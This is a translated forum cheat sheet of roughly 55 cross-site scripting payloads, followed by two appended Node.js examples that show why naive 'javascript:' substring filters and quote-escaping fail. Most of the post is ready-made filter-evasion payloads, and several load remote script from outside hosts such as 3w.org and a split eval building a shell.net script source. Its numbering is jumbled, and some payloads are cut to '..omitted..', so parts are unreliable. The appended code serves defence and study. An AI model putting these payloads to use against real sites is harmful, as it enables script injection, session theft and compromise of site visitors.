
XSS Attack Roundup

Posted 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(99) Alternative pop-ups

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command

<IMG SRC="javascript:alert('XSS');">

(3) IMG tag without semicolons or quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#88;&#83;&#83;&#34;&#41;>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab, splitting the JavaScript

<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript

<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example

<IMG SRC=..omitted..>

(16) Working around a length limit (all parts must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters basically have no effect in China, because there is nowhere they can be exploited.

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag

<IMG SRC=" &#14;  javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC

<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC

<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript

<IMG SRC='vbscript:msgbox("XSS")'>

(41) META link URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character prepended (1-32&34&39&160&8192-8203&12288&65279)

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute, split expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (an open angle bracket and a letter are enough)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE

..omitted..exppression(alert("XSS"))'>

(53) STYLE background

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS

<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

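Added example, not part of the original post: items (3) to (19) and (40) all defeat the same defence, a substring match for "javascript:" on the raw attribute value. The code below (Node.js, no dependencies) does what an HTML and URL parser do before the scheme is compared, numeric entity decoding with and without semicolons, control-character stripping, case folding, and shows which of the post's payloads a substring check misses. The sample values are constructed from the post's payloads (attribute value only, the part after SRC=); the function and variable names are this example's own.

```javascript
// Added example, not from the original post. Node.js, no dependencies.
// Sample values are constructed from the post's IMG SRC payloads.

// 1. Decode numeric character references the way an HTML parser does: decimal
//    (&#106;) and hex (&#x6A;); the semicolon is optional when the next
//    character cannot continue the number (items 5, 9, 10).
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (whole, body) => {
    const isHex = body[0] === 'x' || body[0] === 'X';
    const cp = isHex ? parseInt(body.slice(1), 16) : parseInt(body, 10);
    return cp > 0x10ffff ? whole : String.fromCodePoint(cp);
  });
}

// 2. Drop ASCII controls and spaces. The URL parser strips tab/LF/CR anywhere and
//    other C0 controls at the ends (items 11-14, 17, 19); a filter is better off
//    removing all of them before it looks at the scheme.
function stripControls(s) {
  return s.replace(/[\u0000-\u0020\u007f]/g, '');
}

// 3. Normalise and extract the scheme; null when the value is not an absolute URL.
function effectiveScheme(attrValue) {
  let v = attrValue.trim().replace(/^["']|["']$/g, '');
  v = stripControls(decodeNumericEntities(v)).toLowerCase();
  const m = /^([a-z][a-z0-9+.\-]*):/.exec(v);
  return m ? m[1] : null;
}

const SCRIPT_SCHEMES = new Set(['javascript', 'vbscript']);

function isScriptUrl(attrValue) {
  return SCRIPT_SCHEMES.has(effectiveScheme(attrValue));
}

// The check the post's payloads are written against: a case-insensitive
// substring match on the raw attribute value.
function naiveBlocklist(attrValue) {
  return /javascript:/i.test(attrValue);
}

// Constructed samples, keyed by the post's item number.
const SAMPLES = {
  plain:       "javascript:alert('XSS')",                                                      // (3)
  mixedCase:   "JaVaScRiPt:alert('XSS')",                                                      // (4)
  decimal:     "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",  // (5)
  noSemicolon: "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')", // (9)
  hex:         "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29", // (10)
  tab:         "jav\tascript:alert('XSS')",                                                    // (11)
  encodedTab:  "jav&#x09;ascript:alert('XSS')",                                                // (12)
  newline:     "jav&#x0A;ascript:alert('XSS')",                                                // (13)
  cr:          "jav&#x0D;ascript:alert('XSS')",                                                // (14)
  nul:         "java\u0000script:alert('XSS')",                                                // (17)
  leadingJunk: " &#14;  javascript:alert('XSS')",                                              // (19)
  vbscript:    'vbscript:msgbox("XSS")',                                                       // (40)
  benign:      "https://example.org/logo.png",          // an ordinary image URL
  benignQuery: "/images/a.png?note=javascript:",        // relative URL, has no scheme at all
};

// Payloads the scheme check flags but the substring check lets through.
function missedByNaiveFilter() {
  return Object.keys(SAMPLES).filter(k => isScriptUrl(SAMPLES[k]) && !naiveBlocklist(SAMPLES[k]));
}

// Values the substring check rejects although they carry no script scheme.
function falsePositivesOfNaiveFilter() {
  return Object.keys(SAMPLES).filter(k => naiveBlocklist(SAMPLES[k]) && !isScriptUrl(SAMPLES[k]));
}

console.log('missed by substring check:', missedByNaiveFilter());
console.log('false positives of substring check:', falsePositivesOfNaiveFilter());
```

This covers `javascript:` in attribute URL values only. The post's CSS entries (39, 46 to 53) put the URL inside `url()` or `expression()`, where the CSS tokenizer applies its own escape syntax (`\6A` for `j`), so a filter for those needs a second decoder; and on current browsers `javascript:` is ignored in IMG SRC, the attributes that still matter are `href`, `iframe src`, `form action` and the like, but the decoding steps before the scheme check are the same.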
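Added example, not part of the original post: items (28) and (29) both target filters that believe removing or escaping quote characters is enough. The code below (Node.js, no dependencies) reproduces both against a stand-in for the browser: `new Function()` runs the generated script so the outcome is a return value rather than an `alert()`, and a global counter `__xssHit` stands in for `alert()`. The template strings, the `jsStringLiteral` helper and the names are this example's own.

```javascript
// Added example, not from the original post. Node.js, no dependencies.

// (29) "escaping the escape". Vulnerable template: the app drops user input
// into a JS string literal and only turns " into \".
function naiveEscape(s) {
  return s.replace(/"/g, '\\"');
}
function renderNaive(input) {
  return 'var name="' + naiveEscape(input) + '"; return name;';
}

// Hardened template: JSON.stringify escapes backslashes, quotes and control
// characters, so a leading backslash in the input can no longer neutralise the
// escape. "<" is escaped as well so a value containing </script> cannot close
// the block, and U+2028/U+2029 because older engines treat them as line breaks.
function jsStringLiteral(s) {
  return JSON.stringify(s)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}
function renderSafe(input) {
  return 'var name=' + jsStringLiteral(input) + '; return name;';
}

// The post's payload \";alert('XSS');// with alert() replaced by a counter.
const PAYLOAD_29 = '\\";__xssHit++;//';

// Execute a generated script; report what it returned and whether the payload ran.
function run(script) {
  globalThis.__xssHit = 0;
  const value = new Function(script)();
  return { value, hit: globalThis.__xssHit };
}

// (28) A filter that strips quotes and semicolons from the page does not stop a
// script from producing a string: a regex literal's .source is one, and
// automatic semicolon insertion supplies the missing ";" at the newline.
function stripQuotesAndSemicolons(text) {
  return text.replace(/['";]/g, '');
}
const SCRIPT_28 = 'a=/XSS/\nreturn a.source';   // the post's alert(a.source), returned instead

function stringAfterQuoteStripping() {
  return new Function(stripQuotesAndSemicolons(SCRIPT_28))();
}

console.log('naive template:', run(renderNaive(PAYLOAD_29)));   // value undefined, hit 1
console.log('safe template: ', run(renderSafe(PAYLOAD_29)));    // value === payload, hit 0
console.log('regex source:  ', stringAfterQuoteStripping());     // "XSS"
```

With the naive template the generated source is `var name="\\";__xssHit++;//"; return name;`: the attacker's backslash consumes the escaping backslash, the quote is live, and everything after it is attacker code. The hardened template produces `var name="\\\";__xssHit++;//"; return name;`, a single string literal that round-trips the input unchanged.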